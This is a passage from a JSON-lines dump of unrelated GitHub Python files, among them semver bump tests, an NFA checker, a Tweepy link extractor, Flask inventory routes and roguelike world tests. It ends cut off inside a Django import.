PrereleaseMismatchError\n\n\nclass TestBump(unittest.TestCase):\n\n def setUp(self):\n \"\"\"\n \"\"\"\n pass\n\n def tearDown(self):\n \"\"\"\n \"\"\"\n pass\n\n @patch('pygsver.bump.write_version')\n @patch('pygsver.bump.bump_version')\n @patch('pygsver.bump.read_version')\n def test__run_bump_Should_CallExpected_When_Called(self, read_version_patch, bump_version_patch, write_version_patch, *patches):\n settings = {\n 'semver_branch': 'main',\n 'semver_path': '/repo/.semver'\n }\n repo_mock = Mock()\n run_bump(repo_mock, axis='--axis--', prefix='--prefix--', settings=settings)\n bump_version_patch.assert_called_once_with(read_version_patch.return_value, '--axis--', '--prefix--')\n write_version_patch.assert_called_once_with(settings, str(bump_version_patch.return_value), force=True)\n\n def test__check_prerelease_Should_RaisePrereleaseMismatchError_When_PrereleaseMismatch(self, *patches):\n with self.assertRaises(PrereleaseMismatchError):\n check_prerelease('dev.1', 'test')\n check_prerelease('dev.1', 'dev')\n\n def test__bump_version_Should_ReturnExpectedVersion_When_Called(self, *patches):\n self.assertEqual(str(bump_version('0.1.0', 'major', None)), '1.0.0')\n self.assertEqual(str(bump_version('0.1.0', 'minor', None)), '0.2.0')\n self.assertEqual(str(bump_version('0.1.0', 'patch', None)), '0.1.1')\n self.assertEqual(str(bump_version('0.1.1', 'patch', 'dev')), '0.1.2')\n self.assertEqual(str(bump_version('0.1.0', 'pre', 'dev')), '0.1.1-dev.1')\n self.assertEqual(str(bump_version('0.1.1-dev.1', 'pre', 'dev')), '0.1.1-dev.2')\n self.assertEqual(str(bump_version('0.1.1-dev.2', 'final', None)), '0.1.1')\n with self.assertRaises(PrereleaseMismatchError):\n bump_version('0.1.1-dev.1', 'pre', 'rc')\n\n self.assertEqual(str(bump_version('1.0.0', 'pre', 'dev')), '1.0.1-dev.1')\n\n version = bump_version('1.0.1', 'pre', 'dev')\n self.assertEqual(str(version), '1.0.2-dev.1')\n\n version = bump_version(str(version), 'pre', 'dev')\n self.assertEqual(str(version), '1.0.2-dev.2')\n\n version = bump_version(str(version), 'patch', None)\n self.assertEqual(str(version), '1.0.3')\n\n version = bump_version(str(version), 'pre', 'dev')\n self.assertEqual(str(version), '1.0.4-dev.1')\n\n version = bump_version(str(version), 'minor', None)\n self.assertEqual(str(version), '1.1.0')\n\n version = bump_version(str(version), 'pre', 'dev')\n self.assertEqual(str(version), '1.1.1-dev.1')\n\n version = bump_version(str(version), 'major', None)\n self.assertEqual(str(version), '2.0.0')\n\n version = bump_version(str(version), 'pre', 'dev')\n self.assertEqual(str(version), '2.0.1-dev.1')\n\n version = bump_version(str(version), 'final', None)\n self.assertEqual(str(version), '2.0.1')\n\n version = bump_version(str(version), 'pre', 'dev')\n self.assertEqual(str(version), '2.0.2-dev.1')\n\n version = bump_version(str(version), 'pre', None)\n self.assertEqual(str(version), '2.0.2-dev.2')\n","repo_name":"edgexfoundry/git-semver","sub_path":"src/unittest/python/test_bump.py","file_name":"test_bump.py","file_ext":"py","file_size_in_byte":3407,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"75"} +{"seq_id":"35731132064","text":"import os\nimport re\nfrom setuptools import setup, find_packages\n\n\n__pkg_name__ = 'protein_design'\n\nverstrline = open(os.path.join(__pkg_name__, '__init__.py'), 'r').read()\nvsre = r\"^__version__ = ['\\\"]([^'\\\"]*)['\\\"]\"\nmo = re.search(vsre, verstrline, re.M)\nif mo:\n __version__= mo.group(1)\nelse:\n raise RuntimeError('Unable to find version string in \"{}/__init__.py\".'.format(__pkg_name__))\n\nwith open('requirements.txt') as f:\n requirements = f.read().splitlines()\n\nsetup(name=__pkg_name__,\n version=__version__,\n packages=find_packages(),\n install_requires=requirements,\n zip_safe = False,\n )","repo_name":"mosayebi/protein_design_with_isambard","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"9090639058","text":"file_name, input_name, word = map(str, input().split())\r\n\r\nf = open(input_name, \"r\")\r\n\r\ncounter = 0\r\nsigma = []\r\nstates = []\r\nfinal_states = []\r\nstart_state = []\r\n\r\ntransitions = []\r\n\r\nvalid_NFA = True\r\n\r\nf.readline()\r\nf.readline()\r\nf.readline()\r\n\r\nfor line in f:\r\n line = line.strip(\"\\n\")\r\n if line == \"Sigma:\":\r\n letter = f.readline().strip(\"\\n\")\r\n letter = letter.strip(\" \")\r\n while letter != \"End\":\r\n sigma.append(letter)\r\n letter = f.readline().strip(\"\\n\")\r\n letter = letter.strip(\" \")\r\n counter = counter + 1\r\n if counter != 3:\r\n f.readline()\r\n f.readline()\r\n f.readline()\r\n elif line == \"States:\":\r\n state = f.readline().strip(\"\\n\")\r\n state = state.strip(\" \")\r\n while state != \"End\":\r\n lista_state = state.split(\",\")\r\n if (len(lista_state) == 1):\r\n states.append(state)\r\n else:\r\n lista_state[0] = lista_state[0].strip(\" \")\r\n if len(lista_state[1]) > 1:\r\n final_states.append(lista_state[0])\r\n start_state.append(lista_state[0])\r\n elif lista_state[1] == \"F\":\r\n final_states.append(lista_state[0])\r\n else:\r\n start_state.append(lista_state[0])\r\n states.append(lista_state[0])\r\n state = f.readline().strip(\"\\n\")\r\n state = state.strip(\" \")\r\n counter = counter + 1\r\n if counter != 3:\r\n f.readline()\r\n f.readline()\r\n f.readline()\r\n elif line == \"Transitions:\":\r\n transition = f.readline().strip(\"\\n\")\r\n transition = transition.strip(\" \")\r\n while transition != \"End\":\r\n transitions.append(transition)\r\n transition = f.readline().strip(\"\\n\")\r\n transition = transition.strip(\" \")\r\n counter = counter + 1\r\n if counter != 3:\r\n f.readline()\r\n f.readline()\r\n f.readline()\r\n\r\ntransitions_matrix = [[[] for i in range(len(states))] for j in range(len(states))]\r\n\r\nfor i in range(len(transitions)):\r\n if valid_NFA == True:\r\n a,b,c = transitions[i].split(\",\")\r\n b = b.strip(\" \")\r\n c = c.strip(\" \")\r\n if a not in states or c not in states or b not in sigma:\r\n valid_NFA = False\r\n else:\r\n x = states.index(a)\r\n y = states.index(c)\r\n transitions_matrix[x][y].append(b)\r\n\r\nif len(start_state) != 1:\r\n valid_NFA = False\r\nelif len(final_states) == 0:\r\n valid_NFA = False\r\nelif start_state[0] not in states:\r\n valid_NFA = False\r\n\r\nif valid_NFA == False:\r\n print(\"Invalid NFA\")\r\nelse:\r\n i = 0\r\n stack = [start_state[0]]\r\n temporary_stack = []\r\n while i != len(word):\r\n for k in range(0, len(stack)):\r\n index = states.index(stack[k])\r\n for j in range(0, len(states)):\r\n if len(transitions_matrix[index][j]) != 0:\r\n for litera in transitions_matrix[index][j]:\r\n if litera == word[i] :\r\n temporary_stack.append(states[j])\r\n\r\n stack=temporary_stack.copy()\r\n temporary_stack.clear()\r\n i = i + 1\r\n\r\n ok=0\r\n for i in range(0, len(stack)):\r\n if stack[i] in final_states:\r\n print(\"Accepted\")\r\n ok=1\r\n break;\r\n if ok==0 :\r\n print(\"Rejected\")\r\n","repo_name":"alien1403/Tema-Laborator-LFA","sub_path":"Tema 2/nfa_acceptance_engine.py","file_name":"nfa_acceptance_engine.py","file_ext":"py","file_size_in_byte":3513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"70416210484","text":"'''\n¿Cuál es la salida del siguiente fragmento de código?\n'''\ndef fun(x):\n x +=1\n return x\n\nx = 2\nx = fun(x+1)\nprint(x)\n\n#4\n#5\n#3\n#codigo erroneo","repo_name":"Lubonch/Laboratorios-IFTS11","sub_path":"Tecnicas de Programacion/TP4/Ej41.py","file_name":"Ej41.py","file_ext":"py","file_size_in_byte":150,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"27835538293","text":"\"\"\"\nTwitter api: extract tweets\n\"\"\"\n\nimport os\nimport re\nimport sys\nfrom urllib.request import urlopen\nfrom urllib.error import HTTPError\nfrom tweepy.error import TweepError\nimport requests\nimport tweepy\n\nimport gn_modules.secure_dotenv as gn_dotenv\n\nHEADERS = {'USER-agent': ('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5)'\n 'AppleWebKit/537.36 (KHTML, like Gecko)'\n 'Chrome/45.0.2454.101 Safari/537.36')}\n\n# USER = \"libe\"\n# USER = \"lemondefr\"\n# USER = \"lequipe\"\n# USER = \"le_Parisien\"\nUSER = \"LesEchos\"\n# USER = \"LaCroix\"\n# USER = \"Le_Figaro\"\n# USER = \"Mediapart\"\n# USER = \"LeHuffPost\"\n\n\ndef create_api():\n \"\"\"Create an api with API key and access token\"\"\"\n\n gn_dotenv.load_dotenv_secure()\n api_key = os.environ.get('API_KEY')\n api_secret_key = os.environ.get('API_SECRET_KEY')\n access_token = os.environ.get('ACCESS_TOKEN')\n access_token_secret = os.environ.get('ACCESS_TOKEN_SECRET')\n\n auth = tweepy.OAuthHandler(api_key, api_secret_key)\n auth.set_access_token(access_token, access_token_secret)\n _api = tweepy.API(auth, wait_on_rate_limit=True,\n wait_on_rate_limit_notify=True)\n\n try:\n _api.verify_credentials()\n except TweepError:\n print(\"Error during twitter authentication\")\n sys.exit()\n\n return _api\n\n\ndef find_url(tweet):\n \"\"\"Extract link from the tweet\"\"\"\n regex = r\"(?i)\\b((?:https?://|www\\d{0,3}[.]|[a-z0-9.\\-]+[.][a-z]{2,4}/)(?:[^\\s()<>]+|\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\))+(?:\\(([^\\s()<>]+|(\\([^\\s()<>]+\\)))*\\)|[^\\s`!()\\[\\]{};:'\\\".,<>?«»“”‘’]))\"\n url = re.findall(regex, tweet)\n return url[0][0]\n\n\ndef get_original_twitter_url(_url):\n \"\"\"Get the original url from the extracted url\"\"\"\n response = requests.get(url=_url, headers=HEADERS)\n data = response.text\n url = re.search(\"(?Phttps?://[^\\s]+)\\\"\", data).group(\"url\")\n url = urlopen(url).url\n return url\n\n\ndef extract_tweets_and_print_results(_api, max_tweets: int):\n \"\"\"Extract the given number of tweets and print the results\"\"\"\n articles_entries = []\n\n for tweet in tweepy.Cursor(_api.user_timeline, screen_name=USER, tweet_mode=\"extended\").items(limit=max_tweets):\n try:\n # print(tweet.full_text)\n if hasattr(tweet, 'retweeted_status'):\n link = find_url(tweet.retweeted_status.full_text)\n else:\n link = find_url(tweet.full_text)\n except IndexError:\n continue\n print(link) # print link extracted\n try:\n link = get_original_twitter_url(link)\n except HTTPError:\n continue\n articles_entries.append({'link': link, 'date': tweet.created_at})\n\n print('\\n\\n\\n\\n')\n for article in articles_entries:\n print(article['link'])\n print(article['date'])\n\n print(\"Total: \" + str(len(articles_entries)))\n\n\napi = create_api()\nextract_tweets_and_print_results(api, 50)\n","repo_name":"getalp/genderednews","sub_path":"examples/example_twitter_api.py","file_name":"example_twitter_api.py","file_ext":"py","file_size_in_byte":2965,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"} +{"seq_id":"3088267279","text":"import logging\nimport click\n\nlogger = logging.getLogger('nal_blog_cli')\n\n\n@click.group()\ndef cli():\n import sys\n\n root = logging.getLogger()\n root.setLevel(logging.DEBUG)\n\n ch = logging.StreamHandler(sys.stdout)\n ch.setLevel(logging.DEBUG)\n formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\n ch.setFormatter(formatter)\n root.addHandler(ch)\n\n\n@cli.command()\n@click.option('--rootpath', default='/', help='Root path of the site')\ndef build(rootpath):\n from .build import write_site\n logger.info('Writing out site...')\n write_site({'rootpath': rootpath})\n logger.info('...done')\n\n\n@cli.command()\n@click.option('--rootpath', default='/', help='Root path of the site')\ndef watch(rootpath):\n import time\n import sys\n from pelican.utils import folder_watcher\n from .build import write_site, TEMPLATE_DIR, SITE_ROOT_DIR, POST_DIR, SITE_DIR\n from .server import get_server\n\n watchers = {\n 'posts': folder_watcher(POST_DIR, ['.md']),\n 'root': folder_watcher(SITE_ROOT_DIR, ['']),\n 'templates': folder_watcher(TEMPLATE_DIR, ['.html']),\n }\n\n server_thread = get_server(path=SITE_DIR)\n server_thread.daemon = True\n server_thread.start()\n\n logger.info('AutoReload setup')\n\n try:\n while True:\n try:\n # Check source dir for changed files ending with the given\n # extension in the settings. In the theme dir is no such\n # restriction; all files are recursively checked if they\n # have changed, no matter what extension the filenames\n # have.\n modified = {k: next(v) for k, v in watchers.items()}\n\n if any(modified.values()):\n print('\\nModified: {}. re-generating...'.format(\n ', '.join(k for k, v in modified.items() if v)))\n\n write_site({'rootpath': rootpath})\n except KeyboardInterrupt:\n logger.warning(\"Keyboard interrupt, quitting.\")\n break\n\n except Exception:\n logger.exception('Failed to rgenerate website. Eating, will try again.')\n finally:\n time.sleep(.5) # sleep to avoid cpu load\n\n except Exception as e:\n logger.exception('Failed to rgenerate website. Exiting.')\n sys.exit(getattr(e, 'exitcode', 1))\n","repo_name":"voidfiles/blog-test","sub_path":"nalblog/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":2419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"74893710963","text":"from django.urls import path\nfrom . import views\n\n# Redirecting the 'fill_form' action specified in the
to views.py and executing the function fill_form\nurlpatterns = [\n path('form/daily_form', views.fill_daily_form, name='fill_form'),\n path('form/fill_form', views.fill_form),\n path('loginForm', views.loginForm),\n path('login', views.login),\n path('table', views.table),\n path('loginTable', views.loginTable)\n]\n\nhandler404 = 'daily_form.views.custom_404'\nhandler500 = 'daily_form.views.custom_500'","repo_name":"HariVP03/master-covidality","sub_path":"covidality/daily_form/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":524,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"70901673521","text":"wintable = {\n '가위' : '보',\n '바위' : '가위',\n '보' : '바위'\n }\n\n\ndef rsp(mine,yours) :\n if mine == yours : \n return 'draw'\n elif wintable[mine] == yours :\n return 'win'\n else :\n return 'lose'\n \nresult = rsp('가위','바위')\n\nmessages = {\n 'win' : '이겼어~!',\n 'draw' : 'ㄲㅂ 비겨써',\n 'lose' : 'Wls'\n }\n \nprint(messages[result])","repo_name":"khy0425/School_Project","sub_path":"python/dict_basic.py","file_name":"dict_basic.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"21656713054","text":"import collections\nimport os\nimport pathlib\nimport random\nimport string\nfrom io import BytesIO\n\nimport bleach\nfrom PIL import Image\nfrom flask import Blueprint, render_template, redirect, url_for, request\nfrom flask_login import login_required, current_user\n# from flask_weasyprint import render_pdf, HTML\n\nfrom app import app, __VIEWER__\nfrom database_functions import get_all_user_locations, \\\n get_all_item_types, \\\n update_item_by_id, get_item_by_slug, add_images_to_item, delete_images_from_item, set_item_main_image, \\\n find_inventory_by_slug, \\\n get_item_fields, get_all_item_fields, \\\n get_all_fields, set_field_status, update_item_fields, \\\n set_inventory_default_fields, save_inventory_fieldtemplate, get_user_location_by_id, unrelate_items_by_id, \\\n find_item_by_slug, relate_items_by_id, __PUBLIC, find_user_by_username\nfrom utils import correct_image_orientation\n\nitem_routes = Blueprint('item', __name__)\n\n\n@item_routes.context_processor\ndef my_utility_processor():\n def item_tag_to_string(item_tag_list):\n tag_arr = []\n for tag in item_tag_list:\n tag_arr.append(tag.tag.replace(\"@#$\", \" \"))\n return \",\".join(tag_arr)\n\n return dict(item_tag_to_string=item_tag_to_string)\n\n\n# @item_routes.route('/item/save-pdf', methods=['POST'])\n# @login_required\n# def items_save_pdf():\n# if request.method == 'POST':\n# html = item_with_username_and_inventory()\n#\n# return render_pdf(HTML(string=html))\n\n #return item_with_username_and_inventory()\n\n\n@item_routes.route('/@//')\ndef item_with_username_and_inventory(username: str, inventory_slug: str, item_slug: str):\n inventory_owner_username = username\n inventory_owner = None\n inventory_owner_id = None\n\n user_is_authenticated = current_user.is_authenticated\n all_user_locations_ = None\n if user_is_authenticated:\n all_user_locations_ = get_all_user_locations(user=current_user)\n\n requested_user = current_user\n requested_user_id = requested_user.id\n\n if current_user == inventory_owner_username:\n inventory_owner = current_user\n inventory_owner_id = inventory_owner.id\n\n # check for default inventory\n if inventory_slug == \"d\":\n inventory_slug = f\"default-{username}\"\n\n else:\n requested_user = None\n requested_user_id = None\n\n if inventory_owner is None:\n inventory_owner = find_user_by_username(username=inventory_owner_username)\n if inventory_owner is not None:\n inventory_owner_id = inventory_owner.id\n\n # get the inventory to check permissions\n inventory_, user_inventory_ = find_inventory_by_slug(inventory_slug=inventory_slug,\n inventory_owner_id=inventory_owner_id,\n requesting_user_id=requested_user_id)\n\n if inventory_ is None:\n return render_template('404.html', message=\"No such item or you do not have access to this item\"), 404\n\n item_access_level = __VIEWER__\n if user_inventory_ is None:\n if inventory_.access_level != __PUBLIC:\n return render_template('404.html', message=\"No such item or you do not have access to this item\"), 404\n else:\n item_access_level = user_inventory_.access_level\n\n item_data_ = get_item_by_slug(item_slug=item_slug)\n if item_data_ is not None:\n item_, item_type_string, inventory_item_ = item_data_\n else:\n item_, item_type_string, inventory_item_ = None, None, None\n\n if item_ is None or inventory_item_ is None:\n return render_template('404.html', message=\"No such item or you do not have access to this item\"), 404\n\n item_fields = get_item_fields(item_id=item_.id)\n\n ii = {}\n for field_data in item_fields:\n field_ = field_data[0]\n item_field_ = field_data[1]\n template_field_ = field_data[2]\n ii[template_field_.order] = [field_, item_field_]\n\n od = collections.OrderedDict(sorted(ii.items()))\n\n dfdf = {}\n for k, v in od.items():\n dfdf[v[0]] = v[1]\n\n item_fields = dict(dfdf)\n\n all_item_fields = dict(get_all_item_fields(item_id=item_.id))\n all_fields = dict(get_all_fields())\n\n item_location = None\n if user_is_authenticated and item_access_level != __VIEWER__:\n user_location = get_user_location_by_id(location_id=item_.location_id, user_id=current_user.id)\n if user_location is not None:\n item_location = user_location\n\n all_item_types_ = get_all_item_types()\n\n return render_template('item/item.html', name=username, item_fields=item_fields, all_item_fields=all_item_fields,\n all_fields=all_fields, inventory_slug=inventory_.slug, inventory=inventory_,\n item=item_, username=username, item_type=item_type_string,\n all_item_types=all_item_types_,\n all_user_locations=all_user_locations_, item_location=item_location,\n image_dir=app.config['UPLOAD_FOLDER'], item_access_level=item_access_level)\n\n\n@item_routes.route('/item/edit/', methods=['POST'])\n@login_required\ndef edit_item(item_id):\n if request.method == 'POST':\n form_data = dict(request.form)\n del form_data[\"csrf_token\"]\n item_id = form_data[\"item_id\"]\n del form_data[\"item_id\"]\n\n item_slug = form_data[\"item_slug\"]\n del form_data[\"item_slug\"]\n\n inventory_slug = form_data[\"inventory_slug\"]\n del form_data[\"inventory_slug\"]\n\n username = form_data[\"username\"]\n del form_data[\"username\"]\n\n item_name = request.form.get(\"item_name\")\n item_description = request.form.get(\"item_description\")\n item_quantity = request.form.get(\"item_quantity\")\n\n item_name = bleach.clean(item_name)\n item_description = bleach.clean(item_description)\n item_quantity = bleach.clean(item_quantity)\n\n del form_data[\"item_name\"]\n del form_data[\"item_description\"]\n del form_data[\"item_quantity\"]\n\n item_tags = request.form.get(\"item_tags\")\n item_tags = bleach.clean(item_tags)\n if item_tags != '':\n item_tags = item_tags.strip().split(\",\")\n else:\n item_tags = []\n del form_data[\"item_tags\"]\n\n item_type = request.form.get(\"item_type\")\n item_location = request.form.get(\"item_location\")\n item_specific_location = request.form.get(\"item_specific_location\")\n\n del form_data[\"item_type\"]\n del form_data[\"item_location\"]\n del form_data[\"item_specific_location\"]\n\n form_data = {int(k): v for k, v in form_data.items()}\n\n update_item_fields(data=form_data, item_id=int(item_id))\n\n new_item_data = {\n \"id\": item_id,\n \"name\": item_name,\n \"description\": item_description,\n \"item_type\": item_type,\n \"item_quantity\": item_quantity,\n \"item_location\": item_location,\n \"item_specific_location\": item_specific_location,\n \"item_tags\": item_tags\n }\n\n new_item_slug = update_item_by_id(item_data=new_item_data, item_id=int(item_id), user=current_user)\n return redirect(url_for('item.item_with_username_and_inventory',\n username=username,\n inventory_slug=inventory_slug,\n item_slug=new_item_slug))\n\n\n@item_routes.route('/item/fields', methods=['POST'])\n@login_required\ndef edit_item_fields():\n if request.method == 'POST':\n json_data = request.json\n item_id = json_data['item_id']\n field_ids = json_data['field_ids']\n set_field_status(item_id, field_ids, is_visible=True)\n\n return True\n\n\n@item_routes.route('/default-inventory_fields', methods=['POST'])\n@login_required\ndef edit_inv_default_fields():\n if request.method == 'POST':\n json_data = request.json\n inventory_id = json_data['inventory_id']\n field_ids = json_data['field_ids']\n\n field_ids = [str(x) for x in field_ids]\n\n set_inventory_default_fields(inventory_id=inventory_id, user=current_user, default_fields=field_ids)\n\n return True\n\n\n@item_routes.route('/inventory/save-inventory-template', methods=['POST'])\n@login_required\ndef save_inventory_template():\n if request.method == 'POST':\n form_data = dict(request.form)\n inventory_id = form_data['inventory_id']\n\n inventory_slug = form_data['inventory_slug']\n inventory_template = form_data['inventory_template']\n if inventory_template == '-1':\n inventory_template = None\n save_inventory_fieldtemplate(inventory_id=inventory_id,\n inventory_template=inventory_template, user_id=current_user.id)\n\n return redirect(url_for('items.items_with_username_and_inventory',\n username=current_user.username, inventory_slug=inventory_slug))\n\n\n@item_routes.route(\"/item/relate-items\", methods=[\"POST\"])\ndef relate_items():\n if request.method == 'POST':\n item_id = bleach.clean(request.form.get(\"item_id\"))\n item_id = int(item_id)\n relateditem_slug = bleach.clean(request.form.get(\"relateditem\"))\n inventory_slug = bleach.clean(request.form.get(\"inventory_slug\"))\n item_slug = bleach.clean(request.form.get(\"item_slug\"))\n\n relateditem_ = find_item_by_slug(item_slug=relateditem_slug, user_id=current_user.id)\n\n if relateditem_.id != item_id:\n relate_items_by_id(item1_id=item_id, item2_id=relateditem_.id)\n\n return redirect(url_for('item.item_with_username_and_inventory',\n username=current_user.username,\n inventory_slug=inventory_slug,\n item_slug=item_slug))\n\n\n@item_routes.route('/unrelate-items', methods=['POST'])\ndef unrelate_items():\n if request.method == 'POST':\n json_data = request.json\n item1 = json_data['item1']\n item2 = json_data['item2']\n item1 = int(item1)\n item2 = int(item2)\n unrelate_items_by_id(item1_id=item1, item2_id=item2)\n\n\n@item_routes.route(\"/item/images/remove\", methods=[\"POST\"])\ndef delete_images():\n if request.method == 'POST':\n json_data = request.json\n item_id = json_data['item_id']\n item_slug = json_data['item_slug']\n inventory_slug = json_data['inventory_slug']\n username = json_data['username']\n image_list = json_data['image_id_list']\n\n delete_images_from_item(item_id=item_id, image_ids=image_list, user=current_user)\n\n return redirect(url_for('item.item_with_username_and_inventory',\n username=username,\n inventory_slug=inventory_slug,\n item_slug=item_slug))\n\n\n@item_routes.route(\"/item/images/setmainimage\", methods=[\"POST\"])\ndef set_main_image():\n if request.method == 'POST':\n json_data = request.json\n main_image = json_data['main_image']\n item_slug = json_data['item_slug']\n inventory_slug = json_data['inventory_slug']\n item_id = json_data['item_id']\n username = json_data['username']\n\n main_image = main_image.replace('/uploads/', '')\n\n set_item_main_image(main_image_url=main_image, item_id=item_id, user=current_user)\n\n return redirect(url_for('item.item_with_username_and_inventory',\n username=username,\n inventory_slug=inventory_slug,\n item_slug=item_slug))\n\n\n@item_routes.route(\"/item/images/upload\", methods=[\"POST\"])\ndef upload():\n new_filename_list = []\n\n username = request.form.get(\"username\")\n item_id = request.form.get(\"item_id\")\n item_slug = request.form.get(\"item_slug\")\n inventory_slug = request.form.get(\"inventory_slug\")\n\n uploaded_files = request.files.getlist(\"file[]\")\n for file in uploaded_files:\n file_name, file_extension = os.path.splitext(file.filename)\n\n new_filename = ''.join(random.choices(string.ascii_lowercase, k=15)) + file_extension\n new_filename_list.append(new_filename)\n\n in_mem_file = BytesIO(file.read())\n image = Image.open(in_mem_file)\n\n image = correct_image_orientation(image=image)\n\n image = image.convert('RGB')\n image.thumbnail((600, 600))\n in_mem_file = BytesIO()\n image.save(in_mem_file, format=\"JPEG\")\n in_mem_file.seek(0)\n\n pathlib.Path(os.path.join(app.config['UPLOAD_FOLDER'], new_filename)).write_bytes(\n in_mem_file.getbuffer().tobytes())\n\n add_images_to_item(item_id=item_id, filenames=new_filename_list, user=current_user)\n\n return redirect(url_for('item.item_with_username_and_inventory',\n username=username,\n inventory_slug=inventory_slug,\n item_slug=item_slug))\n","repo_name":"snclucas/thing-list","sub_path":"routes/item_routes.py","file_name":"item_routes.py","file_ext":"py","file_size_in_byte":13157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"37273314445","text":"from PIL import Image\nfrom pylab import *\nimport sys\n\nlower_bound, upper_bound = 50, 255\n\ndef adjacent_black_pixels(i, j, pixels):\n num_black = 0\n for m in range(-1, 2):\n for n in range(-1, 2):\n if pixels[i+m][j+n] <= lower_bound:\n num_black += 1\n return num_black\n\n#Returns a list list of the edges of the given image\ndef find_boundary(img_path):\n im = Image.open(img_path)\n pixels = list(im.getdata())\n width, height = im.size\n pixels = [pixels[i * width:(i + 1) * width] for i in xrange(height)]\n arr = [[0 for _ in range(width)] for _ in range(height)]\n for i in range(1, len(pixels) - 1):\n for j in range(1, len(pixels[0]) - 1):\n if (pixels[i][j] > lower_bound) and (pixels[i][j] <= upper_bound) and (adjacent_black_pixels(i, j, pixels) > 0):\n arr[i][j] = 255\n return arr\n\npath_list = open(sys.argv[1], 'r')\nfor img_path in path_list:\n im = Image.fromarray(np.array(find_boundary(img_path)).astype(np.uint8))\n result.save(img_path[:-3] + \"bmp\")","repo_name":"jeffmahler/GPIS","sub_path":"scripts/binary-image-processing/edge_tracker.py","file_name":"edge_tracker.py","file_ext":"py","file_size_in_byte":1051,"program_lang":"python","lang":"en","doc_type":"code","stars":41,"dataset":"github-code","pt":"75"} +{"seq_id":"15187860379","text":"import unittest\nfrom unittest.mock import Mock, patch\n\nfrom barbarian.world import World\n\n\nclass LevelMock(Mock):\n \"\"\"\n Custom mock for level objects, setting tested attributes\n to dummy values.\n\n \"\"\"\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n\n self.start_pos = (0, 0)\n self.exit_pos = (1, 1)\n\n self.actors = Mock()\n\n\nclass TestWorld(unittest.TestCase):\n\n def test_current_depth_property(self):\n w = World(0, 0)\n # Incrementing current also increments max\n w.current_depth += 1\n self.assertEqual(w.current_depth, 2)\n self.assertEqual(w.max_depth, 2)\n w.current_depth += 1\n self.assertEqual(w.current_depth, 3)\n self.assertEqual(w.max_depth, 3)\n # Decrement leaves max alone\n w.current_depth -= 1\n self.assertEqual(w.current_depth, 2)\n self.assertEqual(w.max_depth, 3)\n\n def test_current_level(self):\n w = World(0, 0)\n\n w.insert_level(1)\n self.assertEqual(1, w.current_level)\n\n w.insert_level(2)\n w.current_depth += 1\n self.assertEqual(2, w.current_level)\n\n def test_insert_level(self):\n w = World(0, 0)\n\n w.insert_level('first')\n self.assertEqual(1, len(w.levels))\n self.assertEqual('first', w.levels[-1])\n\n w.insert_level('second')\n w.current_depth += 1\n self.assertEqual(2, len(w.levels))\n self.assertEqual('second', w.levels[-1])\n\n w.insert_level('replace second', replace_current=True)\n w.current_depth += 1\n self.assertEqual(2, len(w.levels))\n self.assertEqual('replace second', w.levels[-1])\n\n w.insert_level('third')\n w.current_depth += 1\n self.assertEqual(3, len(w.levels))\n self.assertEqual('third', w.levels[-1])\n\n @patch('barbarian.world.Level')\n def test_new_level(self, mock_level):\n w = World(0, 0)\n\n new_level = w.new_level()\n mock_level.assert_called_once_with(w.level_w, w.level_h, depth=1)\n new_level.build_map.assert_called_once()\n new_level.populate.assert_called_once()\n\n @patch('barbarian.world.Level', new_callable=LevelMock)\n def test_change_level_new_depth(self, mock_level):\n w = World(0, 0)\n w.insert_level(w.new_level())\n\n player = Mock()\n w.change_level(1, player)\n\n self.assertEqual(2, w.current_depth)\n self.assertEqual(2, len(w.levels))\n mock_level.assert_called_with(\n w.level_w, w.level_h, depth=w.current_depth)\n\n self.assertEqual(\n (player.pos.x, player.pos.y), w.current_level.start_pos)\n w.current_level.enter.assert_called_once_with(player)\n\n @patch('barbarian.world.Level', new_callable=LevelMock)\n def test_change_level_new_replace(self, mock_level):\n w = World(0, 0)\n w.insert_level(w.new_level())\n\n player = Mock()\n w.change_level(0, player)\n\n self.assertEqual(1, w.current_depth)\n self.assertEqual(1, len(w.levels))\n mock_level.assert_called_with(\n w.level_w, w.level_h, depth=w.current_depth)\n\n self.assertEqual(\n (player.pos.x, player.pos.y), w.current_level.start_pos)\n w.current_level.enter.assert_called_once_with(player)\n\n @patch('barbarian.world.Level', new_callable=LevelMock)\n def test_change_level_backtracking(self, mock_level):\n w = World(0, 0)\n w.insert_level(w.new_level())\n w.current_depth += 1\n w.insert_level(w.new_level())\n\n self.assertEqual(2, w.current_depth)\n self.assertEqual(2, len(w.levels))\n\n player = Mock()\n w.change_level(-1, player)\n\n self.assertEqual(1, w.current_depth)\n self.assertEqual(2, len(w.levels))\n self.assertEqual(2, mock_level.call_count)\n\n self.assertEqual(\n (player.pos.x, player.pos.y), w.current_level.exit_pos)\n w.current_level.enter.assert_called_once_with(player)\n\n def test_change_level_with_no_initial_level(self):\n w = World(0, 0)\n\n player = Mock()\n for delta in (-1, 0, 1):\n self.assertRaises(AssertionError, w.change_level, delta, player)\n","repo_name":"raphigaziano/barbar3","sub_path":"tests/unit/test_world.py","file_name":"test_world.py","file_ext":"py","file_size_in_byte":4224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"37867640431","text":"from __future__ import unicode_literals\n\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom .exceptions import TokenBackendError\nfrom 